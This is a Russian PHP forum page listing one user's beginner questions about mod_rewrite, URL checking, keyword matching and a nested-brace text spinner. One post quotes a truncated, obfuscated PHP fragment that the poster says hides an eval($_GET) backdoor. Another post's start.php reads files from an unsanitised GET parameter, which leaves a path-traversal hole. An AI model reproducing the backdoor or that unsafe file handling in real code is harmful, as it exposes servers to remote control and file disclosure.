PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (1): [1]

> Найдено сообщений: 14
vestmar Отправлено: 07 Августа, 2019 - 00:20:32 • Тема: htaccess, RewriteRule, регулярка. • Форум: Вопросы новичков

Ответов: 0
Просмотров: 220
Добрый день уважаемые специалисты.

Есть такая задача, не могу решить.

нажатие на input:
CODE (htmlphp):
скопировать код в буфер обмена
  1. <form action="/form" target="_blank">
  2. <input name="q" value="1273654" type="hidden"><input type="submit" value="Start Order" />


происходит запрос site.com/form?q=1273654

нужно этот урл передать в php файл через RewriteRule, и передать в него 1273654 GET запросом.

по наитию пишу такой пример RewriteRule ^form\?q\=(\d+)$ /form.php?rel=$1 [L]
но не работает.

Заранее благодарен!
vestmar Отправлено: 01 Июля, 2015 - 00:23:28 • Тема: Нужен скрипт передачи страниц между серверами • Форум: FreeLance

Ответов: 3
Просмотров: 769
да доступы есть, FTP и тп..
в основном VPS, на которых сайты...
vestmar Отправлено: 30 Июня, 2015 - 21:57:48 • Тема: Нужен скрипт передачи страниц между серверами • Форум: FreeLance

Ответов: 3
Просмотров: 769
Доброго времени суток!
Задача такая, на сервер "А" поступил запрос site.com/page-of-helicopter/
правильно в .htaccess отправляет в обработчик,
обработчик отсылает запрос на сервер "Б"
сервер "Б" достает страницу page-of-helicopter.html у себя, отправляет её обратно на сервер "А"
там она кэшируется в папку cache, и выводится.

передачу нужно осуществить методом cURL и/или socket. И ещё пару нюансов,
Кто может реализовать такой не сложный алгоритм) ? И не много рассказать как он работает, сам учу php, вот стоит такая задача в работе, и параллельно в обучении)

О цене договоримся!
vestmar Отправлено: 27 Июня, 2015 - 13:43:58 • Тема: Кто нибудь узнает что за обфускатор? • Форум: Вопросы новичков

Ответов: 0
Просмотров: 76
Кто нибудь узнает что за обфускатор?

вот пример обфусцированного скрипта http://pastebin. com/EYMBaMkB
снять обфускацию можно, но там внутри обыкновенный бэкдор вида eval($_GET[blabla]) или подобное,
вроде как это побитовые операторы, если ссылка не работает то вот часть кода

CODE (htmlphp):
скопировать код в буфер обмена
  1.  
  2. $nSO0XOp='rRD8'^~yeLMHBke0;$Hp5zad2GHW='!v~juY!k{=B'^'aW<N]*A?;tl';$_qfwk4z='"%I'|#XOd1'.
  3.        '&!X';$Ru1Mw9eyh='%@,dnv'&oxfm.'/W';$N1Peyq='@@p!H '|'&eP!H0';$sARR66q='w;7[vg'.
  4.         '#_W}'.j3zG.']'&'%kwO;"v_u](;>g[';$cUS="F_V:FW}y`3oos+w"&'~y[*ng};+7KW_(7';'FC'.
  5.          's7GEyfXksy';$dX="C4+,@5s6#BWG"^"8".oRCw."{Dh|?\$.";$qT='&d]@R@U[V+*Ho?$S"'./*'.
  6.         'GgD*/KHcPDO.'!j}?P%'^RRlc.'&'.to5jUYdXDD5F.'< ['.kppJG.'[NkV';$I2FGbUv5Tq='=~'.
  7.          '}{+mw{m)?yg<-v{$+~~{q4~~1yj'&'<ces/~m?'.lg7iyz.'!>;
  8.  
vestmar Отправлено: 22 Декабря, 2014 - 12:27:56 • Тема: gethostbyaddr таймаут • Форум: Вопросы новичков

Ответов: 1
Просмотров: 152
Добрый день! Кто сталкивался что gethostbyaddr иногда может тормозить, или при частом вызове даже повиснуть сервер. Есть возможности выставить таймаут на эту функцию, я нашёл только упоминание http://ru2.php.net/manual/en/fun....yaddr.php#46869 тут, Спасибо!
vestmar Отправлено: 07 Сентября, 2014 - 10:03:45 • Тема: Парсер "скобок" • Форум: Вопросы новичков

Ответов: 4
Просмотров: 279
Из этой системы, мне нужно собрать "генератор случайных фраз", сами тексты готовит спец. прога, синонимизатор со вложенными значениями, {А может быть корова|{а может быть собака|а может быть ворона}} и к каждому животному идёт ещё {} выражение рассказывающее о них) углубляя возможность текста, с одной строки можно составить пару сотен случайных предложений... 1886153900 число не случайное это crc32 от строки, эта строка будет генерироваться...
vestmar Отправлено: 06 Сентября, 2014 - 23:41:08 • Тема: Парсер "скобок" • Форум: Вопросы новичков

Ответов: 4
Просмотров: 279
Здорово! Действительно работает)

[1] => {Сеня {скрывается|тарится} {от ментов {за грабеж|за нападение}|от прокуратуры {за неуплату налогов|за дело}}

теперь самое сложное) имеет цифру "1886153900" возможно опираясь на неё выбрать

"Сеня скрывается от ментов за нападение".

Т.е. выборка вроде случайная, но она привязана к цифе, я смог составить только для выбора простого значения из переменной $a = "{text1|text2} {key1|key2}";
выборку из каждого {||} одно и выводит в строку...
vestmar Отправлено: 06 Сентября, 2014 - 21:55:28 • Тема: Парсер "скобок" • Форум: Вопросы новичков

Ответов: 4
Просмотров: 279
Вот к примеру многоуровне-вложенное предложение -

{Пошёл Вася {в клуб {тусить|бухать}|в лес {по грибы|по ягоды}}|Сеня скрывается {от ментов {за грабеж|за нападение}|от прокуратуры {за неуплату налогов|за дело}}}

Подскажите пожалуйста как такую строку в массив загнать

вот так:
PHP:
скопировать код в буфер обмена
  1. (
  2. [0] => Пошёл Вася {в клуб {тусить|бухать}|в лес {по грибы|по ягоды}}
  3. [1] => Сеня скрывается {от ментов {за грабеж|за нападение}|от прокуратуры {за неуплату налогов|за дело}}
  4. )
vestmar Отправлено: 27 Августа, 2014 - 10:05:14 • Тема: Перебор массива на совпадения • Форум: Вопросы новичков

Ответов: 2
Просмотров: 193
Как раз вчера такое замутил) только с similar_text

PHP:
скопировать код в буфер обмена
  1. foreach ($new_lines as $key => $value)
  2.                 {
  3.                         $level = levenshtein($a, $value);
  4.                         similar_text($a, $value, $percent);
  5.                         $masiv [$percent] = $value;
  6.                 }
  7.                 krsort($masiv);
  8.                 print_r($masiv);

уже хороший результат, но хотелось бы ещё больше проверок, скажем по регуляркам, + проверяет если в искомом списке (в строке) есть 3 слова которые в этом ключе, то +9 к результату, если 2 то +6, если одно .... и т. д., кодировку переводить я думаю не придётся, хочу иметь очень сильный аглоритм определения, возможно со в временем подключить словарь синонимов которые буду указывать скрипту что Buy и Purcashe (эти глаголы) они не так уж и разные...
vestmar Отправлено: 27 Августа, 2014 - 00:57:14 • Тема: Перебор массива на совпадения • Форум: Вопросы новичков

Ответов: 2
Просмотров: 193
Ни где в сети не нашёл даже намёка по решение,
в общем:
PHP:
скопировать код в буфер обмена
  1.  
  2. $new_lines = array();
  3. $tmp = file('new_anchors.txt'); // берем файл со строками по тематике купить велосипед в омске, в файле около 300 строк, разных ключей на эту тематику....
  4. foreach ($tmp as $v)
  5. {
  6.             $v = trim($v);
  7.             if (empty($v)) {continue;}
  8.             $new_lines[] = $v;
  9. }
  10.  
  11. $a = "buy velosiped in Omsk"; // допустим, этому ключу надо подобрать максимально похожий из списка выше ключ, "buy velosiped online in Omsk"
  12. $pieces = explode(" ", $a);
  13. print_r ($pieces); // "распиливаем" на ключ-значение в массив каждое слово
  14.  

и тут моя-тупить)
Подкиньте идею этого алгоритма поиска (максимально) схожих ключей из списка, а лучше что бы нашёл 5 максимально схожих и рандомно выбрал из них, только прошу без классов и всяких наворотов если можно) я месяц как учить начал...
vestmar Отправлено: 18 Августа, 2014 - 14:41:21 • Тема: Перебор URL в цикле через get_headers • Форум: Вопросы новичков

Ответов: 0
Просмотров: 176
Добрый день, в скрипте нужно перебрать список урл, на действительно, составил такой пример.
т.е. скрипт запрашивает url и по заголовкам определяет существование его, всё это в цикле.

PHP:
скопировать код в буфер обмена
  1. <?PHP
  2. $list = file('ok/p.txt');
  3. $i = 0;
  4. while($i<count($list)){
  5. $string = implode("", (get_headers($list[1], 1)));
  6. if (preg_match("/OK/i", $string)) {
  7.         echo ok;
  8.         //file_put_contents("ok/result".$i.".txt",$list[1]);
  9. }
  10. $i++;
  11. }
  12. ?>


в файле ok/p.txt просто в столбик url-ы типа:

PHP:
скопировать код в буфер обмена
  1. http://www.site.com/index.html
  2. http://www.site.com/index2.htm
  3. и т.д.
  4.  


из 10 урл, сущетсвуют не все, по этом мне надо записать в result только те которые отвечают в заголовке HTTP.1.0 или 1 OK, те которые есть))

беда в том что

кажись с массиво не работает...
Если не трудно, напишите простой пример цикла с перебором url и составлением отчетности.
vestmar Отправлено: 12 Августа, 2014 - 23:50:27 • Тема: Мини движок, Mod_rewrite • Форум: Вопросы новичков

Ответов: 4
Просмотров: 234
В .htaccess есть уже правила для преобразования ссылок, а мне надо вписать ещё одно, страницы которые генерируются не CMS и преобразовываются, а через такой скрипт, и что бы не было конфликта с другими правилами mod_rewrite
vestmar Отправлено: 12 Августа, 2014 - 17:13:19 • Тема: Мини движок, Mod_rewrite • Форум: Вопросы новичков

Ответов: 4
Просмотров: 234
Мне надо что бы, было 2 правила в .htaccess, для двух разных "динамических ссылок", я понимаю что код жесть) пока только такое... я только учусь,
vestmar Отправлено: 12 Августа, 2014 - 14:27:43 • Тема: Мини движок, Mod_rewrite • Форум: Вопросы новичков

Ответов: 4
Просмотров: 234
Структура сайта -

[catalog]
+index.php
[papka]
+[files]
++page1.html
++page2.html
++page3.html
+start.php
.htaccess
index.php


Содержимое .htaccess

RewriteEngine on
RewriteRule ^([^/]*)/$ papka/start.php?page=$1 [L]

Содержимое файла start.php

PHP:
скопировать код в буфер обмена
  1. <?PHP
  2. if(isset($_GET['page'])){$page=$_GET['page'];}
  3. if(isset($page) && !empty($page))
  4.         {
  5.                 $dir="files/";
  6.                 $file=file_get_contents($dir.$page.".html");
  7.                 if(!$file)
  8.                         {
  9.                                 die("File not found!");
  10.                         }
  11.                 echo $file;
  12.         }
  13. ?>




Rewrite Mod делает из ссылок

http://localhost[dot]loc/papka/start.php?page=page1
вот такое:
http://localhost[dot]loc/page1/

#Но вот беда, при запросе:

http://localhost[dot]loc/catalog/

выходит File not found!

потому что страницы такой нет, потому что правило такое, я делал вместо die("File not found!");
die(СЕРВЕР_ХОСТ.СЕРВЕР_РЕКВЕСТ_УРЛ); - но получается цикл))

добавляю в .htaccess

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

http://localhost[dot]loc/catalog/ - открывается,
И тогда главный вопрос, мне надо два таких мини движка, возможно ли писать два условия mod_rewrite в .htaccess ?

Страниц (1): [1]
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB